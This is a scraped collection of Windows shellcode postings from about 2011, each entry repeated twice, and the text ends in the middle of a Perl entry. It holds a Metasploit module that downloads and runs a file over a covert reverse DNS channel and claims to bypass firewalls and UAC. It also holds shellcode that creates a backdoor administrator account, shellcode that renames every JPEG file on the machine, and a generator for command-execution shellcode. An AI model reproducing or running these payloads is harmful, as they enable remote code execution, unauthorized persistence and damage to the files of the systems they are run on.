download & execute file via reverse DNS channel

# Shellcode: download and execute file via reverse DNS channel
    #
    #
    # Features:
    # * Windows 7 tested
    # * UAC without work (svchost.exe makes requests via getaddrinfo)
    # * Firewall/Router/Nat/Proxy bypass reverse connection (like dnscat do, but without sockets and stable!)
    # * NO SOCKET
    #
    # DNS handler - http://dsecrg.com/files/pub/tools/revdns.zip
    #
    #
    # By Alexey Sintsov
    #      [DSecRG]
    #    a.sintsov [sobachka] dsecrg.com
    #    dookie [sobachka] inbox.ru
    #
    # P.S. Works with  Vista/7/2008
    #      do not work in XP/2003 because thre are no IPv6 by default.
    #      can work in XP/2003 if IPv6 installed
    #      (it is not need to be enabled, just installed)
    
    require 'msf/core'
    
    module Metasploit3
    
        include Msf::Payload::Windows
        include Msf::Payload::Single
    
        def initialize(info = {})
            super(update_info(info,
                'Name'          => 'DNS_DOWNLOAD_EXEC',
                'Version'      => '0.01',
                'Description'  => 'Download and Exec (via DNS)',
                'Author'        => [ 'Alexey Sintsov' ],
                'License'      => MSF_LICENSE,
                'Platform'      => 'win',
                'Arch'          => ARCH_X86,
                'Payload'      =>
                    {
                        'Offsets' =>{ },
                       
                        'Begin' => "\xeb\x02\xeb\x7A\xe8\xf9\xff\xff\xff\x47\x65\x74\x50\x72\x6F\x63\x41\x64\x64\x72\x65\x73\x73\xFF\x47\x65\x74\x54\x65\x6d\x70\x50\x61\x74\x68\x41\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x57\x69\x6E\x45\x78\x65\x63\xFF\x45\x78\x69\x74\x54\x68\x72\x65\x61\x64\xff\x4C\x6F\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x41\xFF\x77\x73\x32\x5f\x33\x32\xFF\x57\x53\x41\x53\x74\x61\x72\x74\x75\x70\xFF\x67\x65\x74\x61\x64\x64\x72\x69\x6e\x66\x6f\xFF\x6d\x73\x76\x63\x72\x74\xFF\x66\x6f\x70\x65\x6e\xFF\x66\x77\x72\x69\x74\x65\xFF\xEB\x13\x66\x63\x6c\x6f\x73\x65\xFF",
                       
                        'Payload1' =>            "\xFF\x5e\x33\xc9\xb1\xe4\x8b\xd1\x2b\xe2\x8b\xfc\xf3\xa4\x33\xc0\x8b\xfc\x8A\x04\x39\x3A\xCA\x74\x0D\x3C\xFF\x74\x03\x41\xEB\xF2\x88\x2C\x39\x41\xEB\xEC\xeb\x78\x31\xC9\x64\x8B\x71\x30\x8B\x76\x0C\x8B\x76\x1C\x8B\x5e\x08\x8B\x7E\x20\x33\xed\x83\xc5\x18\x8B\x36\x66\x39\x0C\x2F\x75\xed\x8B\x73\x3C\x8B\x74\x1E\x78\x03\xF3\x8B\x7E\x20\x03\xFB\x8B\x4E\x14\x33\xED\x56\x57\x51\x8B\x3F\x03\xFB\x8B\xF2\x6A\x0E\x59\xF3\xA6\x74\x08\x59\x5F\x83\xC7\x04\x45\xE2\xE9\x59\x5F\x5E\x8B\xCD\x8B\x46\x24\x03\xC3\xD1\xE1\x03\xC1\x33\xC9\x66\x8B\x08\x8B\x46\x1C\x03\xC3\xC1\xE1\x02\x03\xC8\x8B\x01\x03\xC3\x8B\xFA\x8B\xF7\x83\xC6\x0E\x8B\xD0\x6A\x04\x59\xC3\x8b\xd4\xe8\x81\xff\xff\xff\x50\x33\xc0\xb0\x0f\x03\xf8\x57\x53\xff\xd2\x50\x33\xc0\xb0\x14\x03\xf8\x57\x53\xff\x54\x24\x0c\x50\x33\xc0\xb0\x08\x03\xf8\x57\x53\xff\x54\x24\x10\x50\x33\xc0\xb0\x0b\x03\xf8\x57\x53\xff\x54\x24\x14\x50\x8b\xc7\x83\xc0\x0d\x50\xff\x54\x24\x04\x8b\xd8\x33\xc0\xb0\x14\x03\xf8\x57\x53\xff\x54\x24\x18\x50\x33\xc0\xb0\x0b\x03\xf8\x57\x53\xff\x54\x24\x1C\x50\x83\xc7\x0c\x57\xff\x54\x24\x0c\x8b\xd8\x83\xc7\x07\x57\x53\xff\x54\x24\x20\x50\x83\xc7\x06\x57\x53\xff\x54\x24\x24\x50\x50\x8b\xf4\x83\xc7\x09\x57\x53\xff\x54\x24\x2c\x50\x33\xc0\xb4\x03\x2b\xe0\x8b\xcc\x51\x50\xff\x56\x20\x03\xe0\x59\x59\x8b\xc8\xb8",
                       
                        'Payload2' =>    "\xba\x01\x01\x01\x01\x2b\xc2\x50\xb8\x79\x78\x6f\x2e\x50\x2b\xe1\x8b\xcc\x33\xc0\xb0\x77\xb4\x62\x50\x54\x51\xff\x56\x08\x33\xd2\xb6\x03\xb2\x0c\x03\xe2\x50\x33\xc0\xb4\x05\x2b\xe0\x54\x33\xc0\xb0\x02\xb4\x02\x50\xff\x56\x10\x32\xc9\x50\x80\xf9\x80\x74\x04\xfe\xc1\xeb\xf6\x83\xc4\x10\xb0\x06\x50\xb0\x01\x50\xb0\x17\x50\x83\xec\x04\x8B\xEC\x83\xC7\x07\x83\xEC\x20\x33\xC0\x8A\x0C\x38\x88\x0C\x04\x40\x84\xC9\x75\xF5\x33\xc0\xb9\x61\x61\x61\x61\x8b\xd9\x51\x8b\xd4\x83\xc2\x7f\x52\x33\xd2\x55\x52\x8b\xd4\x83\xc2\x0c\x52\xff\x56\x0c\x59\x51\x85\xc0\x75\xe7\x33\xDB\xB3\xee\x2B\xE3\x50\x8b\xc5\x8b\x40\x5b\x8b\x48\x18\x8b\x50\x1c\x83\xC1\x08\x33\xC0\x33\xFF\x66\x8B\x01\x66\x3d\xff\xff\x74\x7f\x8b\xf8\xc1\xef\x08\x32\xe4\x5b\x03\xfb\x57\x66\x8B\x59\x02\x66\x89\x5c\x04\x04\x8B\x79\x04\x89\x7C\x04\x06\x8B\x79\x08\x89\x7C\x04\x0A\x8B\x79\x0C\x89\x7C\x04\x0E\x8b\xc2\x85\xc0\x75\xbb\x58\xff\x76\xf8\x50\xb0\x01\x50\x8b\xc4\x83\xc0\x0c\x50\xff\x56\x04\x33\xc0\xb0\xee\x03\xe0\x58\x58\x58\x58\x58\x2D\x61\x61\x61\x61\xC0\xE4\x04\x02\xC4\x3C\xFF\x75\x13\x8A\xE0\x40\xc1\xe8\x10\x3c\x1a\x75\x04\xfe\xc4\x32\xc0\xc1\xe0\x10\xeb\x08\x40\x8a\xe0\xC0\xEC\x04\x24\x0F\x05\x61\x61\x61\x61\x50\xe9\x46\xff\xff\xff\x8b\x46\xf8\x50\xff\x56\xfc\x66\xb8\x22\x05\x03\xe0"+"\x68\x2f\x63\x20\x22\x68\x63\x6d\x64\x20\x8b\xcc\x41\x8a\x01\x84\xc0\x75\xf9\xc6\x01\x22\x88\x41\x01"+"\x33\xc0\x8b\xcc\x50\x51\xff\x56\x1c\x50\xff\x56\x18"
                       
                    }
                ))
    
            # We use rtlExitThread(0)
            deregister_options('EXITFUNC')
    
            # Register the domain and cmd options
            register_options(
                [
                    OptString.new('DOMAIN', [ true, "The domain name to use (9 bytes - maximum)" ]),
                    OptString.new('FILE', [ true, "Filename extension (default VBS)" ]),
                ], self.class)
        end
    
        #
        # Constructs the payload
        #
        def generate_stage
            domain  = datastore['DOMAIN'] || ''
            extens  = datastore['FILE'] || 'vbs'
           
            # \"x66\x79\x66\x01"
            extLen=extens.length
           
            while extens.length<4
                extens=extens+"\x01"
            end
           
            i=0
            while i<extLen
                extens[i,1]=(extens[i].ord+1).chr
                i=i+1
            end
           
            while domain.length<10
                domain=domain+"\xFF"
            end
           
            domain="\x2e"+domain
           
            payload=module_info['Payload']['Begin'] + domain + module_info['Payload']['Payload1'] + extens + module_info['Payload']['Payload2']
                   
            return payload
        end
    
    end 

download & execute file via reverse DNS channel

# Shellcode: download and execute file via reverse DNS channel
    #
    #
    # Features:
    # * Windows 7 tested
    # * UAC without work (svchost.exe makes requests via getaddrinfo)
    # * Firewall/Router/Nat/Proxy bypass reverse connection (like dnscat do, but without sockets and stable!)
    # * NO SOCKET
    #
    # DNS handler - http://dsecrg.com/files/pub/tools/revdns.zip
    #
    #
    # By Alexey Sintsov
    #      [DSecRG]
    #    a.sintsov [sobachka] dsecrg.com
    #    dookie [sobachka] inbox.ru
    #
    # P.S. Works with  Vista/7/2008
    #      do not work in XP/2003 because thre are no IPv6 by default.
    #      can work in XP/2003 if IPv6 installed
    #      (it is not need to be enabled, just installed)
    
    require 'msf/core'
    
    module Metasploit3
    
        include Msf::Payload::Windows
        include Msf::Payload::Single
    
        def initialize(info = {})
            super(update_info(info,
                'Name'          => 'DNS_DOWNLOAD_EXEC',
                'Version'      => '0.01',
                'Description'  => 'Download and Exec (via DNS)',
                'Author'        => [ 'Alexey Sintsov' ],
                'License'      => MSF_LICENSE,
                'Platform'      => 'win',
                'Arch'          => ARCH_X86,
                'Payload'      =>
                    {
                        'Offsets' =>{ },
                       
                        'Begin' => "\xeb\x02\xeb\x7A\xe8\xf9\xff\xff\xff\x47\x65\x74\x50\x72\x6F\x63\x41\x64\x64\x72\x65\x73\x73\xFF\x47\x65\x74\x54\x65\x6d\x70\x50\x61\x74\x68\x41\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x57\x69\x6E\x45\x78\x65\x63\xFF\x45\x78\x69\x74\x54\x68\x72\x65\x61\x64\xff\x4C\x6F\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x41\xFF\x77\x73\x32\x5f\x33\x32\xFF\x57\x53\x41\x53\x74\x61\x72\x74\x75\x70\xFF\x67\x65\x74\x61\x64\x64\x72\x69\x6e\x66\x6f\xFF\x6d\x73\x76\x63\x72\x74\xFF\x66\x6f\x70\x65\x6e\xFF\x66\x77\x72\x69\x74\x65\xFF\xEB\x13\x66\x63\x6c\x6f\x73\x65\xFF",
                       
                        'Payload1' =>            "\xFF\x5e\x33\xc9\xb1\xe4\x8b\xd1\x2b\xe2\x8b\xfc\xf3\xa4\x33\xc0\x8b\xfc\x8A\x04\x39\x3A\xCA\x74\x0D\x3C\xFF\x74\x03\x41\xEB\xF2\x88\x2C\x39\x41\xEB\xEC\xeb\x78\x31\xC9\x64\x8B\x71\x30\x8B\x76\x0C\x8B\x76\x1C\x8B\x5e\x08\x8B\x7E\x20\x33\xed\x83\xc5\x18\x8B\x36\x66\x39\x0C\x2F\x75\xed\x8B\x73\x3C\x8B\x74\x1E\x78\x03\xF3\x8B\x7E\x20\x03\xFB\x8B\x4E\x14\x33\xED\x56\x57\x51\x8B\x3F\x03\xFB\x8B\xF2\x6A\x0E\x59\xF3\xA6\x74\x08\x59\x5F\x83\xC7\x04\x45\xE2\xE9\x59\x5F\x5E\x8B\xCD\x8B\x46\x24\x03\xC3\xD1\xE1\x03\xC1\x33\xC9\x66\x8B\x08\x8B\x46\x1C\x03\xC3\xC1\xE1\x02\x03\xC8\x8B\x01\x03\xC3\x8B\xFA\x8B\xF7\x83\xC6\x0E\x8B\xD0\x6A\x04\x59\xC3\x8b\xd4\xe8\x81\xff\xff\xff\x50\x33\xc0\xb0\x0f\x03\xf8\x57\x53\xff\xd2\x50\x33\xc0\xb0\x14\x03\xf8\x57\x53\xff\x54\x24\x0c\x50\x33\xc0\xb0\x08\x03\xf8\x57\x53\xff\x54\x24\x10\x50\x33\xc0\xb0\x0b\x03\xf8\x57\x53\xff\x54\x24\x14\x50\x8b\xc7\x83\xc0\x0d\x50\xff\x54\x24\x04\x8b\xd8\x33\xc0\xb0\x14\x03\xf8\x57\x53\xff\x54\x24\x18\x50\x33\xc0\xb0\x0b\x03\xf8\x57\x53\xff\x54\x24\x1C\x50\x83\xc7\x0c\x57\xff\x54\x24\x0c\x8b\xd8\x83\xc7\x07\x57\x53\xff\x54\x24\x20\x50\x83\xc7\x06\x57\x53\xff\x54\x24\x24\x50\x50\x8b\xf4\x83\xc7\x09\x57\x53\xff\x54\x24\x2c\x50\x33\xc0\xb4\x03\x2b\xe0\x8b\xcc\x51\x50\xff\x56\x20\x03\xe0\x59\x59\x8b\xc8\xb8",
                       
                        'Payload2' =>    "\xba\x01\x01\x01\x01\x2b\xc2\x50\xb8\x79\x78\x6f\x2e\x50\x2b\xe1\x8b\xcc\x33\xc0\xb0\x77\xb4\x62\x50\x54\x51\xff\x56\x08\x33\xd2\xb6\x03\xb2\x0c\x03\xe2\x50\x33\xc0\xb4\x05\x2b\xe0\x54\x33\xc0\xb0\x02\xb4\x02\x50\xff\x56\x10\x32\xc9\x50\x80\xf9\x80\x74\x04\xfe\xc1\xeb\xf6\x83\xc4\x10\xb0\x06\x50\xb0\x01\x50\xb0\x17\x50\x83\xec\x04\x8B\xEC\x83\xC7\x07\x83\xEC\x20\x33\xC0\x8A\x0C\x38\x88\x0C\x04\x40\x84\xC9\x75\xF5\x33\xc0\xb9\x61\x61\x61\x61\x8b\xd9\x51\x8b\xd4\x83\xc2\x7f\x52\x33\xd2\x55\x52\x8b\xd4\x83\xc2\x0c\x52\xff\x56\x0c\x59\x51\x85\xc0\x75\xe7\x33\xDB\xB3\xee\x2B\xE3\x50\x8b\xc5\x8b\x40\x5b\x8b\x48\x18\x8b\x50\x1c\x83\xC1\x08\x33\xC0\x33\xFF\x66\x8B\x01\x66\x3d\xff\xff\x74\x7f\x8b\xf8\xc1\xef\x08\x32\xe4\x5b\x03\xfb\x57\x66\x8B\x59\x02\x66\x89\x5c\x04\x04\x8B\x79\x04\x89\x7C\x04\x06\x8B\x79\x08\x89\x7C\x04\x0A\x8B\x79\x0C\x89\x7C\x04\x0E\x8b\xc2\x85\xc0\x75\xbb\x58\xff\x76\xf8\x50\xb0\x01\x50\x8b\xc4\x83\xc0\x0c\x50\xff\x56\x04\x33\xc0\xb0\xee\x03\xe0\x58\x58\x58\x58\x58\x2D\x61\x61\x61\x61\xC0\xE4\x04\x02\xC4\x3C\xFF\x75\x13\x8A\xE0\x40\xc1\xe8\x10\x3c\x1a\x75\x04\xfe\xc4\x32\xc0\xc1\xe0\x10\xeb\x08\x40\x8a\xe0\xC0\xEC\x04\x24\x0F\x05\x61\x61\x61\x61\x50\xe9\x46\xff\xff\xff\x8b\x46\xf8\x50\xff\x56\xfc\x66\xb8\x22\x05\x03\xe0"+"\x68\x2f\x63\x20\x22\x68\x63\x6d\x64\x20\x8b\xcc\x41\x8a\x01\x84\xc0\x75\xf9\xc6\x01\x22\x88\x41\x01"+"\x33\xc0\x8b\xcc\x50\x51\xff\x56\x1c\x50\xff\x56\x18"
                       
                    }
                ))
    
            # We use rtlExitThread(0)
            deregister_options('EXITFUNC')
    
            # Register the domain and cmd options
            register_options(
                [
                    OptString.new('DOMAIN', [ true, "The domain name to use (9 bytes - maximum)" ]),
                    OptString.new('FILE', [ true, "Filename extension (default VBS)" ]),
                ], self.class)
        end
    
        #
        # Constructs the payload
        #
        def generate_stage
            domain  = datastore['DOMAIN'] || ''
            extens  = datastore['FILE'] || 'vbs'
           
            # \"x66\x79\x66\x01"
            extLen=extens.length
           
            while extens.length<4
                extens=extens+"\x01"
            end
           
            i=0
            while i<extLen
                extens[i,1]=(extens[i].ord+1).chr
                i=i+1
            end
           
            while domain.length<10
                domain=domain+"\xFF"
            end
           
            domain="\x2e"+domain
           
            payload=module_info['Payload']['Begin'] + domain + module_info['Payload']['Payload1'] + extens + module_info['Payload']['Payload2']
                   
            return payload
        end
    
    end 

Add Admin Shellcode 112 bytes

# Title      : win32/PerfectXp-pc1/sp3 (Tr) Add Admin Shellcode 112 bytes
    # Author    : KaHPeSeSe
    # Screenshot : http://i53.tinypic.com/289yamq.jpg
    # Desc.      : usr: kpss , pass: 12345 , localgroup: Administrator
    # Tested on  : PERFECT XP PC1 / SP3
    # Date      : 18/07/2011
    # Not        : a.q kpss :((
     
    #include <stdio.h>
    #include <string.h>
    #include <stdlib.h>
     
    int main(){
         
        unsigned char shellcode[]=
        "\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x4e\x53\xbb\x0d\x25\x86\x7c"
        "\xff\xd3\x31\xc0\x50\xbb\x12\xcb\x81\x7c\xff\xd3\xe8\xe0\xff\xff\xff"
        "\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73"
        "\x65\x72\x20\x6b\x70\x73\x73\x20\x31\x32\x33\x34\x35\x20\x2f\x61\x64"
        "\x64\x20\x26\x26\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72\x6f"
        "\x75\x70\x20\x41\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74\x6f\x72\x73"
        "\x20\x2f\x61\x64\x64\x20\x6b\x70\x73\x73";
     
        printf("Size = %d bytes\n", strlen(shellcode));
     
        ((void (*)())shellcode)();
         
         
     
        return 0;
    } 

Add Admin Shellcode 112 bytes

# Title      : win32/PerfectXp-pc1/sp3 (Tr) Add Admin Shellcode 112 bytes
    # Author    : KaHPeSeSe
    # Screenshot : http://i53.tinypic.com/289yamq.jpg
    # Desc.      : usr: kpss , pass: 12345 , localgroup: Administrator
    # Tested on  : PERFECT XP PC1 / SP3
    # Date      : 18/07/2011
    # Not        : a.q kpss :((
     
    #include <stdio.h>
    #include <string.h>
    #include <stdlib.h>
     
    int main(){
         
        unsigned char shellcode[]=
        "\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x4e\x53\xbb\x0d\x25\x86\x7c"
        "\xff\xd3\x31\xc0\x50\xbb\x12\xcb\x81\x7c\xff\xd3\xe8\xe0\xff\xff\xff"
        "\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73"
        "\x65\x72\x20\x6b\x70\x73\x73\x20\x31\x32\x33\x34\x35\x20\x2f\x61\x64"
        "\x64\x20\x26\x26\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72\x6f"
        "\x75\x70\x20\x41\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74\x6f\x72\x73"
        "\x20\x2f\x61\x64\x64\x20\x6b\x70\x73\x73";
     
        printf("Size = %d bytes\n", strlen(shellcode));
     
        ((void (*)())shellcode)();
         
         
     
        return 0;
    } 

Win32 / Windows7 Sp1 - rename .jpeg to .vir

# Exploit Title: Win32 / Windows7 Sp1 - rename .jpeg to .vir (57 bytes)
    # Date: July, 23 2011
    # Author: Theuzuki.'
    # Vendor or Software Link: -
    # Version: -
    # Category:: shellcodes
    # Google dork: -
    # Tested on: Windows 7 sp 1
    # Demo site: -
    
    ==================================================
    Made by:
    
    ___________.__            ____ ___              __  .__
    \__    ___/|  |__  ____ |    |  \__________ __|  | _|__|
      |    |  |  |  \_/ __ \|    |  /\___  /  |  \  |/ /  |
      |    |  |  Y  \  ___/|    |  /  /    /|  |  /    <|  |
      |____|  |___|  /\___  >______/  /_____ \____/|__|_ \__|
                    \/    \/Rats Crew      \/ TheCod3r \/ 
    
    
    
    Mail: Uzuki@live.de
    Website: www.thecoder.co.tv
    Nicknames: TheUzuki.' / TheCod3r
    Greeting: TheRats Crew
    ==================================================
    
    #include <stdio.h>
    #include <string.h>
    #include <stdlib.h>
    
    char code[] = "\xeb\x16\x5b\x31\xc0\x50"
    "\x53\xbb\x39\xe7\x99\x75\xff\xd3\x31\xc0"
    "\x50\xbb\x6f\x2a\x96\x75\xff\xd3\xe8\xe5"
    "\xff\xff\xff\x63\x6d\x64\x2e\x65\x78\x65"
    "\x20\x52\x45\x4e\x20\x2a\x2e\x6a\x70\x65"
    "\x67\x20\x2a\x2e\x76\x69\x72\x00";
    
    int main(int argc, char **argv)
    {
        ((void (*)())code)();
        printf("Renaming all .jpeg files to .vir files");
        return 0;
    }
     

Win32 / Windows7 Sp1 - rename .jpeg to .vir

# Exploit Title: Win32 / Windows7 Sp1 - rename .jpeg to .vir (57 bytes)
    # Date: July, 23 2011
    # Author: Theuzuki.'
    # Vendor or Software Link: -
    # Version: -
    # Category:: shellcodes
    # Google dork: -
    # Tested on: Windows 7 sp 1
    # Demo site: -
    
    ==================================================
    Made by:
    
    ___________.__            ____ ___              __  .__
    \__    ___/|  |__  ____ |    |  \__________ __|  | _|__|
      |    |  |  |  \_/ __ \|    |  /\___  /  |  \  |/ /  |
      |    |  |  Y  \  ___/|    |  /  /    /|  |  /    <|  |
      |____|  |___|  /\___  >______/  /_____ \____/|__|_ \__|
                    \/    \/Rats Crew      \/ TheCod3r \/ 
    
    
    
    Mail: Uzuki@live.de
    Website: www.thecoder.co.tv
    Nicknames: TheUzuki.' / TheCod3r
    Greeting: TheRats Crew
    ==================================================
    
    #include <stdio.h>
    #include <string.h>
    #include <stdlib.h>
    
    char code[] = "\xeb\x16\x5b\x31\xc0\x50"
    "\x53\xbb\x39\xe7\x99\x75\xff\xd3\x31\xc0"
    "\x50\xbb\x6f\x2a\x96\x75\xff\xd3\xe8\xe5"
    "\xff\xff\xff\x63\x6d\x64\x2e\x65\x78\x65"
    "\x20\x52\x45\x4e\x20\x2a\x2e\x6a\x70\x65"
    "\x67\x20\x2a\x2e\x76\x69\x72\x00";
    
    int main(int argc, char **argv)
    {
        ((void (*)())code)();
        printf("Renaming all .jpeg files to .vir files");
        return 0;
    }
     

win32/ 7 sp1 MessageBox

# Exploit Title: win32/ 7 sp1 MessageBox
    # Date: July, 23 2011
    # Author: Theuzuki.'
    # Vendor or Software Link: -
    # Version: -
    # Category:: shellcodes
    # Google dork: -
    # Tested on: Windows 7 sp 1
    # Demo site: -
    
    ==================================================
    Discovered by:
    
    ___________.__            ____ ___              __  .__
    \__    ___/|  |__  ____ |    |  \__________ __|  | _|__|
      |    |  |  |  \_/ __ \|    |  /\___  /  |  \  |/ /  |
      |    |  |  Y  \  ___/|    |  /  /    /|  |  /    <|  |
      |____|  |___|  /\___  >______/  /_____ \____/|__|_ \__|
                    \/    \/  Rats Crew    \/  TheCod3r\/ 
    
    Mail: Uzuki@live.de
    Website: www.thecoder.co.tv
    Nicknames: TheUzuki.' / TheCod3r
    Greeting: TheRats Crew
    ==================================================
    
    #include <stdio.h>
    #include <string.h>
    #include <stdlib.h>
    
    char code[] = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xeb\x2a\x59\xbb\x04\x28\x96\x75\x51\xff\xd3\xeb\x2f\x59\x51\x50\xbb\xd7\x17\x96\x75\xff\xd3\xeb\x34\x59\x31\xd2\x52\x51\x51\x52\xff\xd0\x31\xd2\x50\xb8\x6f\x2a\x96\x75\xff\xd0\xe8\xd1\xff\xff\xff\x75\x73\x65\x72\x33\x32\x2e\x64\x6c\x6c\x00\xe8\xcc\xff\xff\xff\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x41\x00\xe8\xc7\xff\xff\xff\x54\x65\x73\x65\x64\x20\x66\x6f\x72\x20\x48\x61\x63\x6b\x69\x6e\x67\x20\x77\x69\x6e\x37\x20\x2d\x20\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x00";
    
    int main(int argc, char **argv)
    {
        ((void (*)())code)();
        printf("Printing MsgBox with Tesed for Hacking win7 - MessageBox");
        return 0;
    }
    
    

win32/ 7 sp1 MessageBox

# Exploit Title: win32/ 7 sp1 MessageBox
    # Date: July, 23 2011
    # Author: Theuzuki.'
    # Vendor or Software Link: -
    # Version: -
    # Category:: shellcodes
    # Google dork: -
    # Tested on: Windows 7 sp 1
    # Demo site: -
    
    ==================================================
    Discovered by:
    
    ___________.__            ____ ___              __  .__
    \__    ___/|  |__  ____ |    |  \__________ __|  | _|__|
      |    |  |  |  \_/ __ \|    |  /\___  /  |  \  |/ /  |
      |    |  |  Y  \  ___/|    |  /  /    /|  |  /    <|  |
      |____|  |___|  /\___  >______/  /_____ \____/|__|_ \__|
                    \/    \/  Rats Crew    \/  TheCod3r\/ 
    
    Mail: Uzuki@live.de
    Website: www.thecoder.co.tv
    Nicknames: TheUzuki.' / TheCod3r
    Greeting: TheRats Crew
    ==================================================
    
    #include <stdio.h>
    #include <string.h>
    #include <stdlib.h>
    
    char code[] = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xeb\x2a\x59\xbb\x04\x28\x96\x75\x51\xff\xd3\xeb\x2f\x59\x51\x50\xbb\xd7\x17\x96\x75\xff\xd3\xeb\x34\x59\x31\xd2\x52\x51\x51\x52\xff\xd0\x31\xd2\x50\xb8\x6f\x2a\x96\x75\xff\xd0\xe8\xd1\xff\xff\xff\x75\x73\x65\x72\x33\x32\x2e\x64\x6c\x6c\x00\xe8\xcc\xff\xff\xff\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x41\x00\xe8\xc7\xff\xff\xff\x54\x65\x73\x65\x64\x20\x66\x6f\x72\x20\x48\x61\x63\x6b\x69\x6e\x67\x20\x77\x69\x6e\x37\x20\x2d\x20\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x00";
    
    int main(int argc, char **argv)
    {
        ((void (*)())code)();
        printf("Printing MsgBox with Tesed for Hacking win7 - MessageBox");
        return 0;
    }
    
    

Command Execution exploit/shellcode

#!/usr/bin/perl

system("cls");

sub logo(){

print q'

0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

1                      ______                                          0

0                   .-"      "-.                                       1

1                  / KedAns-Dz  \ =-=-=-=-=-=-=-=-=-=-=-|              0

0 Algerian HaCker |              | > Site : 1337day.com |              1

1 --------------- |,  .-.  .-.  ,| > Twitter : @kedans  |              0

0                 | )(_o/  \o_)( | > ked-h@hotmail.com  |              1

1                 |/     /\     \| =-=-=-=-=-=-=-=-=-=-=|              0

0       (@_       (_     ^^     _)  HaCkerS-StreeT-Team                1

1  _     ) \_______\__|IIIIII|__/_______________________               0

0 (_)@8@8{}<________|-\IIIIII/-|________________________>              1

1        )_/        \          /                                       0

0       (@           `--------` © 2011, Inj3ct0r Team                  1

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-0

0 Windows/32bit - Command Execution Exploit/ShellCode - 44 Bytes + CMD 1

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-0

';

}

logo();

###

# Title : win32/xp sp3 Command Execution exploit/shellcode - 44 Bytes + CMD

# Author : KedAns-Dz

# E-mail : ked-h@hotmail.com (ked-h@1337day.com) | ked-h@exploit-id.com

# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)

# Web Site : www.1337day.com * www.exploit-id.com * www.09exploit.com

# Twitter page : twitter.com/kedans

# platform : win32

# Impact : Command Execution / Shellcode maker

# Tested on : Windows XP sp3 Fr

###

# (~) Greetings To : Caddy-Dz (+) JaGo-Dz (+) Dr.Ride (+) All My Friends 

###

$ARGC=@ARGV;

if ($ARGC!=1) { 

   print "\n [!] Usage: perl $0 [Command] \n\n"; 

   die " [*] f.ex: perl $0 shutdown -s -t 18 \n"; 

}

my $CMD = shift;

my $header = q'

#include <stdio.h>

#include <string.h>

#include <stdlib.h>



int main(){

    

    unsigned char shellcode[]=

';

my $sh = q'

"\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x29\x53\xbb\xad\x23\x86\x7c".

"\xff\xd3\x31\xc0\x50\xbb\xfa\xca\x81\x7c\xff\xd3\xe8\xe0\xff\xff\xff".

"\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20'.$CMD.'"';

my $end = q'



    printf("Size = %d bytes\n", strlen(shellcode));

 

    ((void (*)())shellcode)();

 

    return 0;

}

';



print $header.$sh.$end;

Command Execution exploit/shellcode

#!/usr/bin/perl

system("cls");

sub logo(){

print q'

0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

1                      ______                                          0

0                   .-"      "-.                                       1

1                  / KedAns-Dz  \ =-=-=-=-=-=-=-=-=-=-=-|              0

0 Algerian HaCker |              | > Site : 1337day.com |              1

1 --------------- |,  .-.  .-.  ,| > Twitter : @kedans  |              0

0                 | )(_o/  \o_)( | > ked-h@hotmail.com  |              1

1                 |/     /\     \| =-=-=-=-=-=-=-=-=-=-=|              0

0       (@_       (_     ^^     _)  HaCkerS-StreeT-Team                1

1  _     ) \_______\__|IIIIII|__/_______________________               0

0 (_)@8@8{}<________|-\IIIIII/-|________________________>              1

1        )_/        \          /                                       0

0       (@           `--------` © 2011, Inj3ct0r Team                  1

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-0

0 Windows/32bit - Command Execution Exploit/ShellCode - 44 Bytes + CMD 1

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-0

';

}

logo();

###

# Title : win32/xp sp3 Command Execution exploit/shellcode - 44 Bytes + CMD

# Author : KedAns-Dz

# E-mail : ked-h@hotmail.com (ked-h@1337day.com) | ked-h@exploit-id.com

# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)

# Web Site : www.1337day.com * www.exploit-id.com * www.09exploit.com

# Twitter page : twitter.com/kedans

# platform : win32

# Impact : Command Execution / Shellcode maker

# Tested on : Windows XP sp3 Fr

###

# (~) Greetings To : Caddy-Dz (+) JaGo-Dz (+) Dr.Ride (+) All My Friends 

###

$ARGC=@ARGV;

if ($ARGC!=1) { 

   print "\n [!] Usage: perl $0 [Command] \n\n"; 

   die " [*] f.ex: perl $0 shutdown -s -t 18 \n"; 

}

my $CMD = shift;

my $header = q'

#include <stdio.h>

#include <string.h>

#include <stdlib.h>



int main(){

    

    unsigned char shellcode[]=

';

my $sh = q'

"\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x29\x53\xbb\xad\x23\x86\x7c".

